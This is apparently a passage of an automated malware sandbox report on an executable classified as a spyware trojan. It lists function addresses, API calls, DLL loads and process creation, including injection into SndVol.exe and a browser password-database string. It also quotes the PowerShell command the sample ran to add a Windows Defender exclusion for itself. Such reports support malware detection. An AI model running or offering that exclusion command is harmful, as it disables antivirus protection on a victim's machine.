                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012A16CC5_2_012A16CC
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012859105_2_01285910
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F99505_2_011F9950
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0120B9505_2_0120B950
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0125D8005_2_0125D800
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F38E05_2_011F38E0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012AFB765_2_012AFB76
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0120FB805_2_0120FB80
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01265BF05_2_01265BF0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0122DBF95_2_0122DBF9
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01263A6C5_2_01263A6C
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012AFA495_2_012AFA49
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012A7A465_2_012A7A46
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01235AA05_2_01235AA0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0128DAAC5_2_0128DAAC
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0129DAC65_2_0129DAC6
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012A7D735_2_012A7D73
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F3D405_2_011F3D40
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012A1D5A5_2_012A1D5A
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0120FDC05_2_0120FDC0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01269C325_2_01269C32
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012AFCF25_2_012AFCF2
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012AFF095_2_012AFF09
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F1F925_2_011F1F92
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012AFFB15_2_012AFFB1
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F9EB05_2_011F9EB0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0524053516_2_05240535
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0530059116_2_05300591
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052F244616_2_052F2446
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052EE4F616_2_052EE4F6
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0524077016_2_05240770
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0526475016_2_05264750
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0523C7C016_2_0523C7C0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0525C6E016_2_0525C6E0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0523010016_2_05230100
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052DA11816_2_052DA118
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052C815816_2_052C8158
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_053001AA16_2_053001AA
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052F81CC16_2_052F81CC
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052D200016_2_052D2000
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052FA35216_2_052FA352
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0524E3F016_2_0524E3F0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_053003E616_2_053003E6
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052E027416_2_052E0274
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052C02C016_2_052C02C0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0524AD0016_2_0524AD00
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052DCD1F16_2_052DCD1F
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_05258DBF16_2_05258DBF
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0523ADE016_2_0523ADE0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_05240C0016_2_05240C00
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052E0CB516_2_052E0CB5
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_05230CF216_2_05230CF2
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_05282F2816_2_05282F28
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_05260F3016_2_05260F30
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052B4F4016_2_052B4F40
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052BEFA016_2_052BEFA0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0524CFE016_2_0524CFE0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_05232FC816_2_05232FC8
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052FEE2616_2_052FEE26
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_05240E5916_2_05240E59
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_05252E9016_2_05252E90
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052FCE9316_2_052FCE93
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052FEEDB16_2_052FEEDB
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0525696216_2_05256962
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052429A016_2_052429A0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0530A9A616_2_0530A9A6
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0524A84016_2_0524A840
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0524284016_2_05242840
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052268B816_2_052268B8
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0526E8F016_2_0526E8F0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052FAB4016_2_052FAB40
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052F6BD716_2_052F6BD7
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0523EA8016_2_0523EA80
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052F757116_2_052F7571
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052DD5B016_2_052DD5B0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052FF43F16_2_052FF43F
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0523146016_2_05231460
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052FF7B016_2_052FF7B0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052F16CC16_2_052F16CC
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0527516C16_2_0527516C
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0522F17216_2_0522F172
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0530B16B16_2_0530B16B
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0524B1B016_2_0524B1B0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052F70E916_2_052F70E9
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052FF0E016_2_052FF0E0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052EF0CC16_2_052EF0CC
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052470C016_2_052470C0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052F132D16_2_052F132D
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0522D34C16_2_0522D34C
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0528739A16_2_0528739A
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052452A016_2_052452A0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052E12ED16_2_052E12ED
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0525B2C016_2_0525B2C0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052F7D7316_2_052F7D73
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_05243D4016_2_05243D40
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052F1D5A16_2_052F1D5A
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0525FDC016_2_0525FDC0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052B9C3216_2_052B9C32
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052FFCF216_2_052FFCF2
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052FFF0916_2_052FFF09
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052FFFB116_2_052FFFB1
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_05241F9216_2_05241F92
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_05249EB016_2_05249EB0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052D591016_2_052D5910
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0524995016_2_05249950
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0525B95016_2_0525B950
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052AD80016_2_052AD800
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052438E016_2_052438E0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052FFB7616_2_052FFB76
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0525FB8016_2_0525FB80
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052B5BF016_2_052B5BF0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0527DBF916_2_0527DBF9
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052B3A6C16_2_052B3A6C
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052FFA4916_2_052FFA49
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052F7A4616_2_052F7A46
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052DDAAC16_2_052DDAAC
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_05285AA016_2_05285AA0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_052EDAC616_2_052EDAC6
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_032B1F1016_2_032B1F10
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_032AB19016_2_032AB190
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_032AD06016_2_032AD060
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_032AB04016_2_032AB040
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_032B37C016_2_032B37C0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_032B55D016_2_032B55D0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_032ACE3916_2_032ACE39
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_032ACE4016_2_032ACE40
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_032CBC2016_2_032CBC20
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0555E47316_2_0555E473
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0555E35516_2_0555E355
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0555E80F16_2_0555E80F
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0555D8D816_2_0555D8D8
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 16_2_0555CB7816_2_0555CB78
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: String function: 01225130 appears 56 times
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: String function: 0125EA12 appears 86 times
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: String function: 011DB970 appears 275 times
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: String function: 01237E54 appears 100 times
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: String function: 0126F290 appears 105 times
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 052AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 05275130 appears 57 times
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 052BF290 appears 89 times
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 0522B970 appears 275 times
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 05287E54 appears 100 times
                Source: ungziped_file.exe, 00000000.00000002.1065145964.0000000000D2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs ungziped_file.exe
                Source: ungziped_file.exe, 00000000.00000002.1090175804.0000000007280000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs ungziped_file.exe
                Source: ungziped_file.exe, 00000000.00000002.1078729366.0000000002BE6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs ungziped_file.exe
                Source: ungziped_file.exe, 00000000.00000000.1046304446.000000000073C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameKznq.exe4 vs ungziped_file.exe
                Source: ungziped_file.exe, 00000000.00000002.1088420350.00000000053A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs ungziped_file.exe
                Source: ungziped_file.exe, 00000005.00000002.1397449431.00000000012DD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ungziped_file.exe
                Source: ungziped_file.exeBinary or memory string: OriginalFilenameKznq.exe4 vs ungziped_file.exe
                Source: ungziped_file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: ungziped_file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, YguAtk6ZmoepowUBfe.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, YguAtk6ZmoepowUBfe.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, CXux7G8Bf9KDYHKbCO.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, CXux7G8Bf9KDYHKbCO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, CXux7G8Bf9KDYHKbCO.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@14/12@13/12
                Source: C:\Users\user\Desktop\ungziped_file.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ungziped_file.exe.logJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6624:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j0u1oem5.uob.ps1Jump to behavior
                Source: ungziped_file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: ungziped_file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\ungziped_file.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: SndVol.exe, 00000010.00000002.3510287029.00000000035D8000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000010.00000003.1577523929.0000000003589000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3510287029.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000010.00000003.1580511150.00000000035B5000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000010.00000003.1577665818.00000000035AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: ungziped_file.exeVirustotal: Detection: 38%
                Source: ungziped_file.exeReversingLabs: Detection: 50%
                Source: unknownProcess created: C:\Users\user\Desktop\ungziped_file.exe "C:\Users\user\Desktop\ungziped_file.exe"
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ungziped_file.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess created: C:\Users\user\Desktop\ungziped_file.exe "C:\Users\user\Desktop\ungziped_file.exe"
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess created: C:\Users\user\Desktop\ungziped_file.exe "C:\Users\user\Desktop\ungziped_file.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exeProcess created: C:\Windows\SysWOW64\SndVol.exe "C:\Windows\SysWOW64\SndVol.exe"
                Source: C:\Windows\SysWOW64\SndVol.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ungziped_file.exe"Jump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess created: C:\Users\user\Desktop\ungziped_file.exe "C:\Users\user\Desktop\ungziped_file.exe"Jump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeProcess created: C:\Users\user\Desktop\ungziped_file.exe "C:\Users\user\Desktop\ungziped_file.exe"Jump to behavior
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exeProcess created: C:\Windows\SysWOW64\SndVol.exe "C:\Windows\SysWOW64\SndVol.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
